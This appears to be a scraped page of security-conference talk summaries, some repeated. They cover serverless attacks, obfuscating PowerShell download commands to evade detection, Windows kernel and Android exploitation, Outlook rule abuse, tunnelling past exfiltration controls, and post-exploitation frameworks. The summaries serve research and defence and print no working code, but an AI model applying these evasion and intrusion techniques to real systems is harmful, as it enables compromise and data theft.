This document discusses hacking serverless runtime environments like AWS Lambda, Azure Functions, and Auth0 WebTask. It begins by introducing the presenters and what will be covered. The document then explores how different vendors implement sandbox isolation and common attack techniques like persistence and data exfiltration. It examines specific runtimes like AWS Lambda in depth, investigating how to profile the environment, persist code, and escalate privileges. The document emphasizes that detection is difficult in serverless environments and provides examples of potential indicators of compromise. Overall, the document provides an overview of attacking and defending serverless architectures.
The document discusses techniques for obfuscating PowerShell commands to evade detection. It begins by motivating the need for improved PowerShell logging and detection capabilities as PowerShell is increasingly used by attackers. It then outlines ways to prepare systems for PowerShell investigations through process auditing and command line logging. One section focuses on obfuscating the common technique of using New-Object Net.WebClient to perform remote downloads. It demonstrates how this command can be broken up and variables used to avoid detection based solely on the presence of certain strings.
Velocity 2016 - Operational Excellence with HystrixBilly Yuen
The document discusses operational excellence with Hystrix, a library for handling failures in distributed systems. It provides an overview of Hystrix and how Intuit's QuickBooks Online (QBO) team used it to address challenges from microservices and dependencies. The summary discusses how Hystrix implements automatic fail fast and fallback capabilities, and how the QBO team applied Hystrix, implemented monitoring, and used the data for troubleshooting.
XCon 2014 => http://xcon.xfocus.org/
In the past was quite common to exploit heap / pool manager vulnerabilities attacking its internal linked structures. However current memory management improve a lot and at current date it is quite ineffective to attack heap in this way. But still those techniques come into hand when we start to looking at linked structures widespread throughout kernel that are unfortunately not hardened enough.
In this presentation we will examine power of these vulnerabilities by famous example “CVE – 2013 - 3660”. Showing bypass on ‘lazy’ assertions of _LIST_ENTRY, present exploitation after party and teleport to kernel.
Workshop: PowerShell for Penetration TestersNikhil Mittal
This document outlines a PowerShell workshop for penetration testers. It introduces PowerShell concepts like cmdlets, variables, functions, and modules. It demonstrates how PowerShell can be used offensively for client-side attacks, shells, domain enumeration, and privilege escalation during a penetration test. The document emphasizes that PowerShell has become a critical tool for both red and blue teams. It provides resources for further PowerShell training and penetration testing tools.
DerbyCon 2016
Nick Landers @monoxgas
External mail via Exchange is one of the most common services offered by organizations today. The Microsoft Office suite is even more prevalent making Outlook the most common mail client around. This talk focuses on the abuse of these two products for the purpose of gaining code execution inside remote networks. Subjects include E-Mail and password scraping, OWA/EWS brute forcing techniques, and new research into abusing Outlook mail rules for remote code execution. Learn about the capabilities of client side rules, the underlying Windows APIs, and how to modify these rule objects to make phishing attacks obsolete. Security Consultant at Silent Break Security. Professional Hacker for 2 years. Current work involves writing custom malware and researching unique attack vectors that abuse functionality in windows environments.
This presentation will sum up how to do tunnelling with different protocols and will have different perspectives detailed. For example, companies are fighting hard to block exfiltration from their network: they use http(s) proxies, DLP, IPS technologies to protect their data, but are they protected against tunnelling? There are so many interesting questions to answer for users, abusers, companies and malware researchers. Mitigation and bypass techniques will be shown you during this presentation, which can be used to filter any tunnelling on your network or to bypass misconfigured filters.
Изучаем миллиард состояний программы на уровне профи. Как разработать быстрый...Positive Hack Days
This document discusses dynamic binary instrumentation (DBI) and provides two examples of DBI tools. DBI allows analyzing a program's behavior at runtime by injecting instrumentation code. Two open-source DBI tools are described: WinHeap Explorer detects heap-based bugs with low overhead, while DrLtrace transparently traces malware library calls. DBI provides a powerful method for software security analysis, malware analysis, and reverse engineering. Traditional data structures in DBI can introduce significant overhead, so lightweight approaches are discussed.
The document discusses techniques for obfuscating PowerShell commands to evade detection. It begins by motivating the need for improved PowerShell logging and detection capabilities as PowerShell is increasingly used by attackers. It then outlines ways to prepare systems for PowerShell investigations through process auditing and command line logging. One section focuses on obfuscating the common technique of using New-Object Net.WebClient to perform remote downloads. It demonstrates how this command can be broken up and variables used to avoid detection based solely on the presence of certain strings.
Velocity 2016 - Operational Excellence with HystrixBilly Yuen
The document discusses operational excellence with Hystrix, a library for handling failures in distributed systems. It provides an overview of Hystrix and how Intuit's QuickBooks Online (QBO) team used it to address challenges from microservices and dependencies. The summary discusses how Hystrix implements automatic fail fast and fallback capabilities, and how the QBO team applied Hystrix, implemented monitoring, and used the data for troubleshooting.
XCon 2014 => http://xcon.xfocus.org/
In the past was quite common to exploit heap / pool manager vulnerabilities attacking its internal linked structures. However current memory management improve a lot and at current date it is quite ineffective to attack heap in this way. But still those techniques come into hand when we start to looking at linked structures widespread throughout kernel that are unfortunately not hardened enough.
In this presentation we will examine power of these vulnerabilities by famous example “CVE – 2013 - 3660”. Showing bypass on ‘lazy’ assertions of _LIST_ENTRY, present exploitation after party and teleport to kernel.
Workshop: PowerShell for Penetration TestersNikhil Mittal
This document outlines a PowerShell workshop for penetration testers. It introduces PowerShell concepts like cmdlets, variables, functions, and modules. It demonstrates how PowerShell can be used offensively for client-side attacks, shells, domain enumeration, and privilege escalation during a penetration test. The document emphasizes that PowerShell has become a critical tool for both red and blue teams. It provides resources for further PowerShell training and penetration testing tools.
DerbyCon 2016
Nick Landers @monoxgas
External mail via Exchange is one of the most common services offered by organizations today. The Microsoft Office suite is even more prevalent making Outlook the most common mail client around. This talk focuses on the abuse of these two products for the purpose of gaining code execution inside remote networks. Subjects include E-Mail and password scraping, OWA/EWS brute forcing techniques, and new research into abusing Outlook mail rules for remote code execution. Learn about the capabilities of client side rules, the underlying Windows APIs, and how to modify these rule objects to make phishing attacks obsolete. Security Consultant at Silent Break Security. Professional Hacker for 2 years. Current work involves writing custom malware and researching unique attack vectors that abuse functionality in windows environments.
This presentation will sum up how to do tunnelling with different protocols and will have different perspectives detailed. For example, companies are fighting hard to block exfiltration from their network: they use http(s) proxies, DLP, IPS technologies to protect their data, but are they protected against tunnelling? There are so many interesting questions to answer for users, abusers, companies and malware researchers. Mitigation and bypass techniques will be shown you during this presentation, which can be used to filter any tunnelling on your network or to bypass misconfigured filters.
Изучаем миллиард состояний программы на уровне профи. Как разработать быстрый...Positive Hack Days
This document discusses dynamic binary instrumentation (DBI) and provides two examples of DBI tools. DBI allows analyzing a program's behavior at runtime by injecting instrumentation code. Two open-source DBI tools are described: WinHeap Explorer detects heap-based bugs with low overhead, while DrLtrace transparently traces malware library calls. DBI provides a powerful method for software security analysis, malware analysis, and reverse engineering. Traditional data structures in DBI can introduce significant overhead, so lightweight approaches are discussed.
Dock ir incident response in a containerized, immutable, continually deploy...Shakacon
This document discusses incident response strategies in a containerized and immutable infrastructure environment like Docker. It addresses challenges like lack of system and software inventory visibility due to rapid container changes, and lack of agent-based security due to single-purpose containers. It proposes solutions like establishing managed base container OSs, whitelisting allowed containers and files, and leveraging logs and sidecar containers to monitor for detections. Response challenges around long investigation timeframes due to short container lifetimes and lack of access are addressed with strategies like comprehensive logging, filesystem artifact preservation, and automating remote response capabilities.
The document provides an overview of Empire, an open-source PowerShell and Python post-exploitation framework that allows for C2 infrastructure automation and agent control. It discusses Empire's infrastructure considerations including stagers, launchers, listeners, and automation. It also covers Empire modules, reporting functionality, and the REST API for controlling Empire through scripting.
Security research over Windows #defcon chinaPeter Hlavaty
Past several years Microsoft Windows undergo lot of fundamental security changes. Where one can argue still imperfect and bound to tons of legacy issues, on the other hand those changes made important shifts in attacker perspective. From tightened sandboxing, restricting attack surface, introducing mitigations, applying virtualization up to stronger focus even on win32k. In our talk we will go trough those changes, how it affects us and how we tackle them from choosing targets, finding bugs up to exploitation primitives we are using. While also empathize that windows research is not only about sandbox, and there are many more interesting target to look for.
Steelcon 2014 - Process Injection with Pythoninfodox
This is the slides to accompany the talk given by Darren Martyn at the Steelcon security conference in July 2014 about process injection using python.
Covers using Python to manipulate processes by injecting code on x86, x86_64, and ARMv7l platforms, and writing a stager that automatically detects what platform it is running on and intelligently decides which shellcode to inject, and via which method.
The Proof of Concept code is available at https://github.com/infodox/steelcon-python-injection
You didnt see it’s coming? "Dawn of hardened Windows Kernel" Peter Hlavaty
Past few years our team was focusing on different operating systems including Microsoft windows kernel. Honestly our first pwn at Windows kernel was not that challenging. Number of available targets with friendly environment for straightforward pwn, from user up to reliable kernel code execution.
However, step by step, security policies continue to evolve, and it becomes more troublesome to choose ideal attack surface from various sandboxes. In addition, what steps to follow for digging security holes is highly dependent upon the chosen target. In general, a few common strategies are available for researchers to choose: e.g choose “unknown” one which hasn’t been researched before; Select well fuzzed or well audited one, or research on kernel module internals to find “hidden” attack surfaces which are not explicitly interconnected. In the first part of the talk we introduce our methodology of selecting, alongside with cost of tricks around to choose seemingly banned targets, illustrated by notable examples.
After getting hands on potential bug available from targeted sandbox, it is time for Microsoft windows taking hardening efforts to put attacker into corner. Strong mitigations are being introduced more frequently than ever, with promising direction which cuts lots of attack surface off, and a several exploitation techniques being killed. We will show difficulties of developing universal exploitation techniques, and demonstrate needed technical level depending on code quality of target. We will examine how different it becomes with era of Redstone and following versions even with those techniques and good vulnerability in hand. How it changed attacker landscape and how it will (and will not) kill those techniques and applications. However will it really change the game or not?
This document provides an introduction to red team operations from the perspective of a penetration tester transitioning to become a red teamer. It discusses some of the key differences between penetration testing and red teaming such as scope, reconnaissance required, stealth, and infrastructure setup. The document outlines principles for red team operations including protecting infrastructure, logging everything, managing information, and avoiding detection. It also provides examples of tactics, techniques and procedures used in red team operations as well as considerations for tools like Cobalt Strike to help evade detection.
Recently our team researched various ntos subsystem attack vectors, and one of the outputs we will present in our talk. DeathNote as our internal code name to this component, which resides in Microsoft Windows kernel, hiding behind different interfaces and exposed to user differently.
What can goes bad with it?
Basically two kinds of problems, one is syscall handling via direct user interaction. We will describe how to obtain basic understanding of what's going on, how it interacts with other components and what is its purpose. With those knowledge we will dig deeper how to make more complex fuzzing logic to cause enough chaos that will end up in unexpected behaviors in Windows kernel, and demonstrate some of them.
And as for second, as it hints from title, this module does bit of data parsing, so we will dive deep into internals, pointing out some available materials, and move on to reverse engineered structures and internal mechanism. We will show how some tricks can outcome with various results, and how structured approach can expose more problems than is expected.
Breadcrumbs to Loaves: How tidbits of Information Lead Us to Full-Scale Compromise. Presented at BSides Austin 2017. Follow on Twitter: @arvanaghi
Often on red teams, there is no obvious path to compromising the environment. Reconnaissance efforts, both external and internal, may yield only crumbs of information. Though tiny and often in obscure locations, these bits of information can serve as a trail of breadcrumbs to full-scale compromise. Specific keys in the Windows Registry and unusual sources of open-source intelligence gathering can provide valuable information about a network mapping that most companies don’t know exist. We walk you step-by-step through what some of these crumbs are, how to find them, and how we have used tiny bits of information to escalate our privileges to full-scale enterprise compromise.
This document discusses using PowerShell for penetration testing when standard tools and frameworks may not be usable due to network restrictions or lack of privileges. It provides an introduction to PowerShell and examples of how port scanning, downloading files, and other tasks could be accomplished using PowerShell scripts even in restricted environments. It also covers some of the security mechanisms in PowerShell like execution policies and how they can be bypassed to run unsigned scripts without prompts.
In the past few years, the bar for exploitation was raised highly, and in the current state of software security it is harder and harder to make successful exploitation on newest operating systems.
But as some systems continue to evolve and introduce new mitigations, the others just freeze a few years behind. In our talk we will focus on rooting Android by two racing conditions vulnerabilities. We will show the differences between level of exploitation needed, and how some mobile vendors are killing offered security features.
Rainbow Over the Windows: More Colors Than You Could ExpectPeter Hlavaty
As time goes on operating systems keep evolving, like Microsoft Windows do, it ships new designs, features and codes from time to time. However sometimes it also ships more than bit of codes for complex subsystems residing in its kernel ... and at some future point it starts implementing new designs to prevent unnecessary access to it. However is it safe enough?
As we can see from security bulletins, win32k subsystem attracts lots of attention. It looks that with efforts of many security researchers who has dug into this area, finding bugs here shall becomes pretty tough and almost fruitless. But unfortunately this is not true, as win32k is backed up by very complex logic and large amount of code by nature..
We will present our point of view to Windows graphic subsystem, as well as schema of our fuzzing strategies. We will introduce some unusual areas of win32k, its extensions and how it can breaks even locked environments.
Part of our talk will be dedicated to CVE-2016-0176, the bug we used for this year's Pwn2Own Edge sandbox bypass, from its discovery to its exploitation techniques, which could serves as an example for universal DirectX escape which is independent of graphics vendors.
This document discusses using PowerShell for lethal client-side attacks. It introduces several tools created by the author (Out-Word, Out-Excel, etc.) that generate malicious Microsoft Office files, shortcuts, HTML files and Java files containing PowerShell payloads. These payloads allow executing commands, downloading/running scripts and more complex attacks on the victim's system. The document provides examples usage and discusses using PowerShell's capabilities for effective post-exploitation on client machines. It concludes with recommendations for defense and credits references used in developing the tools.
Modern Reconnaissance Phase on APT - protection layerShakacon
The document discusses 5 case studies of modern reconnaissance techniques used by advanced persistent threat (APT) actors. Each case study examines a different infection vector involving documents with embedded objects that first perform reconnaissance on the target system before deciding whether to deploy a final payload. The case studies demonstrate evolving tactics to avoid exposing valuable code and thwart analysis.
This document discusses vulnerability design patterns for kernel exploitation. It outlines several common vulnerability classes for the kernel including out of boundary errors, buffer overflows, and null pointer writes. It provides examples of how these vulnerabilities could be used to achieve kernel code execution or privilege escalation. It also notes how kernel exploitation techniques have evolved over time to bypass defenses like KASLR and discusses developing exploitation tools instead of just shellcode.
Get-Help: An intro to PowerShell and how to Use it for Eviljaredhaight
This talk covers the basics of how PowerShell works and how to use it. It then goes over a lot of the interesting offensive PowerShell tools that are available and gives a demo of using PowerShell to escalate to Domain Admin privileges on a network.
A video of the talk is available here: https://www.youtube.com/watch?v=YSUJNInriiY
The document discusses using a Teensy microcontroller device to create payloads for penetration testing. It provides an overview of the Teensy, examples of how it has been used in previous penetration tests, and introduces Kautilya, a Ruby-based toolkit that aims to make Teensy more useful for penetration testers by providing pre-built payloads that can be selected and customized. The payloads discussed are mostly for Windows systems and focus on techniques like installing backdoors, modifying system settings, downloading files from pastebins, and collecting information from victims. Limitations and areas for future improvement are also mentioned.
This document provides step-by-step instructions for building a simple orchestrator. It begins by setting up the basic components including RabbitMQ as a messaging broker and Celery workers. Step 1 demonstrates executing a simple AWS resource by adding a task to the queue. Step 2 adds a MongoDB database to store resources outside of the queue. Step 3 builds a service level on top by allowing resources like AWS instances and Docker containers to be orchestrated together through a YAML file.
Today’s cutting edge companies have software release cycles measured in days instead of months. This agility is enabled by the DevOps practice of continuous delivery, which automates building, testing, and deploying all code changes. This automation helps you catch bugs sooner and accelerates developer productivity. In this session, we’ll share best practices (including ones followed internally at Amazon) and how you can bring them to your company by using open source and AWS services.
Speaker: Raghuraman Balachandran, Solutions Architect, Amazon India
Dock ir incident response in a containerized, immutable, continually deploy...Shakacon
This document discusses incident response strategies in a containerized and immutable infrastructure environment like Docker. It addresses challenges like lack of system and software inventory visibility due to rapid container changes, and lack of agent-based security due to single-purpose containers. It proposes solutions like establishing managed base container OSs, whitelisting allowed containers and files, and leveraging logs and sidecar containers to monitor for detections. Response challenges around long investigation timeframes due to short container lifetimes and lack of access are addressed with strategies like comprehensive logging, filesystem artifact preservation, and automating remote response capabilities.
The document provides an overview of Empire, an open-source PowerShell and Python post-exploitation framework that allows for C2 infrastructure automation and agent control. It discusses Empire's infrastructure considerations including stagers, launchers, listeners, and automation. It also covers Empire modules, reporting functionality, and the REST API for controlling Empire through scripting.
Security research over Windows #defcon chinaPeter Hlavaty
Past several years Microsoft Windows undergo lot of fundamental security changes. Where one can argue still imperfect and bound to tons of legacy issues, on the other hand those changes made important shifts in attacker perspective. From tightened sandboxing, restricting attack surface, introducing mitigations, applying virtualization up to stronger focus even on win32k. In our talk we will go trough those changes, how it affects us and how we tackle them from choosing targets, finding bugs up to exploitation primitives we are using. While also empathize that windows research is not only about sandbox, and there are many more interesting target to look for.
Steelcon 2014 - Process Injection with Pythoninfodox
This is the slides to accompany the talk given by Darren Martyn at the Steelcon security conference in July 2014 about process injection using python.
Covers using Python to manipulate processes by injecting code on x86, x86_64, and ARMv7l platforms, and writing a stager that automatically detects what platform it is running on and intelligently decides which shellcode to inject, and via which method.
The Proof of Concept code is available at https://github.com/infodox/steelcon-python-injection
You didnt see it’s coming? "Dawn of hardened Windows Kernel" Peter Hlavaty
Past few years our team was focusing on different operating systems including Microsoft windows kernel. Honestly our first pwn at Windows kernel was not that challenging. Number of available targets with friendly environment for straightforward pwn, from user up to reliable kernel code execution.
However, step by step, security policies continue to evolve, and it becomes more troublesome to choose ideal attack surface from various sandboxes. In addition, what steps to follow for digging security holes is highly dependent upon the chosen target. In general, a few common strategies are available for researchers to choose: e.g choose “unknown” one which hasn’t been researched before; Select well fuzzed or well audited one, or research on kernel module internals to find “hidden” attack surfaces which are not explicitly interconnected. In the first part of the talk we introduce our methodology of selecting, alongside with cost of tricks around to choose seemingly banned targets, illustrated by notable examples.
After getting hands on potential bug available from targeted sandbox, it is time for Microsoft windows taking hardening efforts to put attacker into corner. Strong mitigations are being introduced more frequently than ever, with promising direction which cuts lots of attack surface off, and a several exploitation techniques being killed. We will show difficulties of developing universal exploitation techniques, and demonstrate needed technical level depending on code quality of target. We will examine how different it becomes with era of Redstone and following versions even with those techniques and good vulnerability in hand. How it changed attacker landscape and how it will (and will not) kill those techniques and applications. However will it really change the game or not?
This document provides an introduction to red team operations from the perspective of a penetration tester transitioning to become a red teamer. It discusses some of the key differences between penetration testing and red teaming such as scope, reconnaissance required, stealth, and infrastructure setup. The document outlines principles for red team operations including protecting infrastructure, logging everything, managing information, and avoiding detection. It also provides examples of tactics, techniques and procedures used in red team operations as well as considerations for tools like Cobalt Strike to help evade detection.
Recently our team researched various ntos subsystem attack vectors, and one of the outputs we will present in our talk. DeathNote as our internal code name to this component, which resides in Microsoft Windows kernel, hiding behind different interfaces and exposed to user differently.
What can goes bad with it?
Basically two kinds of problems, one is syscall handling via direct user interaction. We will describe how to obtain basic understanding of what's going on, how it interacts with other components and what is its purpose. With those knowledge we will dig deeper how to make more complex fuzzing logic to cause enough chaos that will end up in unexpected behaviors in Windows kernel, and demonstrate some of them.
And as for second, as it hints from title, this module does bit of data parsing, so we will dive deep into internals, pointing out some available materials, and move on to reverse engineered structures and internal mechanism. We will show how some tricks can outcome with various results, and how structured approach can expose more problems than is expected.
Breadcrumbs to Loaves: How tidbits of Information Lead Us to Full-Scale Compromise. Presented at BSides Austin 2017. Follow on Twitter: @arvanaghi
Often on red teams, there is no obvious path to compromising the environment. Reconnaissance efforts, both external and internal, may yield only crumbs of information. Though tiny and often in obscure locations, these bits of information can serve as a trail of breadcrumbs to full-scale compromise. Specific keys in the Windows Registry and unusual sources of open-source intelligence gathering can provide valuable information about a network mapping that most companies don’t know exist. We walk you step-by-step through what some of these crumbs are, how to find them, and how we have used tiny bits of information to escalate our privileges to full-scale enterprise compromise.
This document discusses using PowerShell for penetration testing when standard tools and frameworks may not be usable due to network restrictions or lack of privileges. It provides an introduction to PowerShell and examples of how port scanning, downloading files, and other tasks could be accomplished using PowerShell scripts even in restricted environments. It also covers some of the security mechanisms in PowerShell like execution policies and how they can be bypassed to run unsigned scripts without prompts.
In the past few years, the bar for exploitation was raised highly, and in the current state of software security it is harder and harder to make successful exploitation on newest operating systems.
But as some systems continue to evolve and introduce new mitigations, the others just freeze a few years behind. In our talk we will focus on rooting Android by two racing conditions vulnerabilities. We will show the differences between level of exploitation needed, and how some mobile vendors are killing offered security features.
Rainbow Over the Windows: More Colors Than You Could ExpectPeter Hlavaty
As time goes on operating systems keep evolving, like Microsoft Windows do, it ships new designs, features and codes from time to time. However sometimes it also ships more than bit of codes for complex subsystems residing in its kernel ... and at some future point it starts implementing new designs to prevent unnecessary access to it. However is it safe enough?
As we can see from security bulletins, win32k subsystem attracts lots of attention. It looks that with efforts of many security researchers who has dug into this area, finding bugs here shall becomes pretty tough and almost fruitless. But unfortunately this is not true, as win32k is backed up by very complex logic and large amount of code by nature..
We will present our point of view to Windows graphic subsystem, as well as schema of our fuzzing strategies. We will introduce some unusual areas of win32k, its extensions and how it can breaks even locked environments.
Part of our talk will be dedicated to CVE-2016-0176, the bug we used for this year's Pwn2Own Edge sandbox bypass, from its discovery to its exploitation techniques, which could serves as an example for universal DirectX escape which is independent of graphics vendors.
This document discusses using PowerShell for lethal client-side attacks. It introduces several tools created by the author (Out-Word, Out-Excel, etc.) that generate malicious Microsoft Office files, shortcuts, HTML files and Java files containing PowerShell payloads. These payloads allow executing commands, downloading/running scripts and more complex attacks on the victim's system. The document provides examples usage and discusses using PowerShell's capabilities for effective post-exploitation on client machines. It concludes with recommendations for defense and credits references used in developing the tools.
Modern Reconnaissance Phase on APT - protection layerShakacon
The document discusses 5 case studies of modern reconnaissance techniques used by advanced persistent threat (APT) actors. Each case study examines a different infection vector involving documents with embedded objects that first perform reconnaissance on the target system before deciding whether to deploy a final payload. The case studies demonstrate evolving tactics to avoid exposing valuable code and thwart analysis.
This document discusses vulnerability design patterns for kernel exploitation. It outlines several common vulnerability classes for the kernel including out of boundary errors, buffer overflows, and null pointer writes. It provides examples of how these vulnerabilities could be used to achieve kernel code execution or privilege escalation. It also notes how kernel exploitation techniques have evolved over time to bypass defenses like KASLR and discusses developing exploitation tools instead of just shellcode.
Get-Help: An intro to PowerShell and how to Use it for Eviljaredhaight
This talk covers the basics of how PowerShell works and how to use it. It then goes over a lot of the interesting offensive PowerShell tools that are available and gives a demo of using PowerShell to escalate to Domain Admin privileges on a network.
A video of the talk is available here: https://www.youtube.com/watch?v=YSUJNInriiY
The document discusses using a Teensy microcontroller device to create payloads for penetration testing. It provides an overview of the Teensy, examples of how it has been used in previous penetration tests, and introduces Kautilya, a Ruby-based toolkit that aims to make Teensy more useful for penetration testers by providing pre-built payloads that can be selected and customized. The payloads discussed are mostly for Windows systems and focus on techniques like installing backdoors, modifying system settings, downloading files from pastebins, and collecting information from victims. Limitations and areas for future improvement are also mentioned.
This document provides step-by-step instructions for building a simple orchestrator. It begins by setting up the basic components including RabbitMQ as a messaging broker and Celery workers. Step 1 demonstrates executing a simple AWS resource by adding a task to the queue. Step 2 adds a MongoDB database to store resources outside of the queue. Step 3 builds a service level on top by allowing resources like AWS instances and Docker containers to be orchestrated together through a YAML file.
Today’s cutting edge companies have software release cycles measured in days instead of months. This agility is enabled by the DevOps practice of continuous delivery, which automates building, testing, and deploying all code changes. This automation helps you catch bugs sooner and accelerates developer productivity. In this session, we’ll share best practices (including ones followed internally at Amazon) and how you can bring them to your company by using open source and AWS services.
Speaker: Raghuraman Balachandran, Solutions Architect, Amazon India
This document discusses strategies for making Ruby on Rails applications highly available. It covers common architectures using a single server, and moving to distributed systems. Key topics include application modularity, useful gems for asynchronous processing, database replication, session management, application deployment, configuration management, and load balancing. The conclusion emphasizes that porting Rails apps to a highly available environment requires thinking about architecture and distribution early, but is not prohibitively difficult if approached methodically.
This document discusses real-world techniques for evading detection of malware in cloud environments. It describes Lambda malware called Denonia that mines Monero cryptocurrency using AWS Lambda functions. Denonia evades detection by using DNS over HTTPS to hide mining pool communications, running the miner from memory only, and writing configuration files to hidden locations. The document also discusses how Denonia and other malware may steal AWS credentials to propagate across cloud accounts. It provides examples of real-world cloud attacks and recommends ways to test detections against emerging techniques.
Talk Venue: BSides Tampa 2020
Speakers: Mike Felch & Joff Thyer
This talk will focus on the many different ways that a penetration tester, or Red Teamer can leverage the Python programming language during offensive operations. Python is a rich and powerful programming language which above all else allows a competent developer to very quickly write new tools that might start as a Proof of Concept, but soon become an invaluable addition to the Red Teamer's tool-belt. Having the skills to both generate new tools, and modify existing tools on the fly is critically important to agility during testing engagement. Everything from utility processing of data, network protocol, API interaction, and exploit development can be rapidly developed due to the high functionality level and intuitive nature of Python.
The document discusses developing Groovy scripts securely and productively in the cloud for Oracle Application Developer Framework (ADF). It outlines using Groovy AST transformations to add debugging capabilities and runtime security checks when executing scripts in the cloud. Caching is also discussed to improve performance of compiling thousands of scripts across many applications. The implementation transforms the AST to wrap method calls and inject breakpoints while limiting access to restricted APIs.
How We Analyzed 1000 Dumps in One Day - Dina Goldshtein, Brightsource - DevOp...DevOpsDays Tel Aviv
The document describes BrightSource Energy's process for analyzing crash dumps from their solar power plant control software. Originally, crashes were analyzed manually using debuggers like Visual Studio, which could take 10 minutes per dump and there were often dozens of dumps per day. They developed an automatic analysis workflow using the ClrMD NuGet package to analyze dumps. The script uses ClrMD to find the exception, call stack, and faulty component in each dump. It then alerts the relevant owner and creates a ticket in Redmine. This reduced analysis time from hours to seconds and allowed them to analyze around 1000 dumps in a single day.
XP Days 2019: First secret delivery for modern cloud-native applicationsVlad Fedosov
In this talk we’ll see how Authentication and Secrets delivery work in distributed containerized applications from the inside. We’ll start from the theory of security and will go through the topics like Container Auth Role, Static & Dynamic secrets, Env vars/volumes for secret delivery, Vault & K8S secrets. After this talk you’ll get an understanding how to securely deploy your containerized workloads.
Cloud adoption fails - 5 ways deployments go wrong and 5 solutionsYevgeniy Brikman
"All happy cloud deployments are alike; each unhappy cloud deployment is unhappy in its own way." — Leo Tolstoy, Site Reliability Engineer
At Gruntwork, I've had the chance to see the cloud adoption journeys of hundreds of companies, from tiny startups to Fortune 50 giants. I've seen those journeys go well. I've seen those journeys go poorly. In this talk, I discuss a few of the ways cloud adoption can go horribly wrong (massive cost overruns, endless death marches, security disasters), and more importantly, how you can get it right.
To help you get it right, we looked at the cloud journeys that were successful and extracted from them the patterns they had in common. We distilled all this experience down into something called the Gruntwork Production Framework, which defines five concrete steps you can follow to adopt the cloud at your own company—and hopefully, to end up with your very own happy cloud deployment.
The document provides an introduction to DIY security automation. It discusses building automation solutions for incident response, security monitoring, and other tasks. It covers approaches like centralized vs distributed automation, using tools like Splunk for alerts and webhooks, and building an automation server with Flask. The document also discusses enriching data, creating tickets, testing APIs, deployment, and other tips for developing a security automation solution.
When you are designing a production environment security is essential. All the Docker ecosystem but in particular Docker Swarm allows us to ship our containers out of our laptop, how can we make this process safe? During my talk, I will share tips around production environment, immutability and how troubleshooting common attack as code injection with Docker. Static analysis of our images, content trust with Notary to make our journey secure.
How can we setup a cluster on the main cloud providers with VPN and node labeling to expose only a portion of our cluster? I will also show what Docker provides (Content Trust, Static Analysis) but also open source alternatives as Notary, centos/clair and Cilium.
In the end of this talk, we had a better idea around how manage Docker in production.
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
In theory, post-exploitation after having remote access is easy. Also in theory, there is no difference between theory and practice. In practice, there is. Imagine a scenario, where the hacker/penetration-tester has deployed a malware on a user's workstation, but the target information is on a secure server accessed via two-factor authentication, with screen access only (e.g. RDP, Citrix, etc.) On top of that, the server runs application white-listing, and only the inbound port to the screen server (e.g. 3389) is allowed through the hardware firewall. But you also need persistent interactive C&C communication (e.g. Netcat, Meterpreter, RAT) to this server through the user's workstation.
I developed (and will publish) two tools that help the community in these situations. The first tool can drop malware to the server through the screen while the user is logged in. The second tool can help to circumvent the hardware firewall after one can execute code on the server with admin privileges (using a signed kernel driver). My tools have been tested against Windows server 2012 and Windows 8, and they work with RDP or other remote desktops (e.g. Citrix). The number of problems one can solve with them are endless, e.g., communicating with bind-shell on webserver behind restricted DMZ. Beware, live demo and fun included!
Do any VM's contain a particular indicator of compromise? E.g. Run a YARA signature over all executables on my virtual machines and tell me which ones match.
Building a serverless company on AWS lambda and Serverless frameworkLuciano Mammino
Planet9energy.com is a new electricity company building a sophisticated analytics and energy trading platform for the UK market. Since the earliest draft of the platform, we took the unconventional decision to go serverless and build the product on top of AWS Lambda and the Serverless framework using Node.js. In this talk, I want to discuss why we took this radical decision, what are the pros and cons of this approach and what are the main issues we faced as a tech team in our design and development experience. We will discuss how normal things like testing and deployment need to be re-thought to work on a serverless fashion but also the benefits of (almost) infinite self-scalability and the peace of mind of not having to manage hundreds of servers. Finally, we will underline how Node.js seems to fit naturally in this scenario and how it makes developing serverless applications extremely convenient.
Technologies:
Backend
Frontend
Application architecture
Javascript
cloud computing
In theory, post-exploitation after having remote access is easy. Also in theory, there is no difference between theory and practice. In practice, there is. Imagine a scenario, where you have deployed a malware on a user’s workstation, but the target information is on a secure server accessed via two-factor authentication, with screen access only (e.g. RDP, Citrix, etc.). On top of that, the server runs application white-listing, and only the inbound port to the screen server (e.g. 3389) is allowed through the hardware firewall. But you also need persistent interactive C&C communication (e.g. Netcat, Meterpreter, RAT) to this server through the user’s workstation.
I developed (and will publish) two tools that help you in these situations. The first tool can drop malware to the server through the screen while the user is logged in. The second tool can help you to circumvent the hardware firewall after we can execute code on the server with admin privileges (using a signed kernel driver). My tools are generic meaning that they work against Windows server 2012 and Windows 8, and they work with RDP or other remote desktops. The number of problems you can solve with them are endless, e.g., communicating with bind-shell on webserver behind restricted DMZ. Beware, live demo and fun included!
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon YangLyon Yang
This is a light training/presentation talk.
My name is Lyon Yang and I am an IoT hacker. I live in sunny Singapore where IoT is rapidly being deployed – in production. This walkthrough will aim to shed light on the subject of IoT, from finding vulnerabilities in IoT devices to getting shiny hash prompts.
Our journey starts with a holistic view of IoT security, the issues faced by IoT devices and the common mistakes made by IoT developers. Things will then get technical as we progress into a both ARM and MIPS exploitation, followed by a ‘hack-along-with-us’ workshop where you will be exploiting a commonly found IoT daemon. If you are new to IoT or a seasoned professional you will likely learn something new in this workshop.
https://www.iotvillage.org/#schedule
As the complexity of your AWS environment grows, automating security is a crucial step in protecting your data from malicious attacks and unintentional vulnerabilities. Automation and security practices must work hand-in-hand in order to effectively protect your environment. In this session, you will learn how to leverage AWS tools and best-in-class 3rd party services to automate access control, security configuration, and monitoring in order to improve your overall security posture. Using real-life examples, you will come away with an understanding of how to secure your deployments while minimizing the work it takes to keep them secure – all while simplifying your compliance audit process. Topics include:
· Controlling access to your environment with automation tools
· Maintaining security during high velocity deployment cycles
· Protecting data from malicious attacks with automated security controls
· Monitoring and measuring configuration, access, and policy changes
AWS Lambda has changed the way we deploy and run software, but this new serverless paradigm has created new challenges to old problems - how do you test a cloud-hosted function locally? How do you monitor them? What about logging and config management? And how do we start migrating from existing architectures?
In this talk Yan will discuss solutions to these challenges by drawing from real-world experience running Lambda in production and migrating from an existing monolithic architecture.
EMBA - Firmware analysis DEFCON30 demolabs USA 2022MichaelM85042
Penetration testing of current embedded devices is quite complex as we have to deal with different architectures, optimized operating systems and special protocols. EMBA is an open-source firmware analyzer with the goal to simplify, optimize and automate the complex task of firmware security analysis.
Project page: https://github.com/e-m-b-a/emba
Conference page: https://forum.defcon.org/node/242109
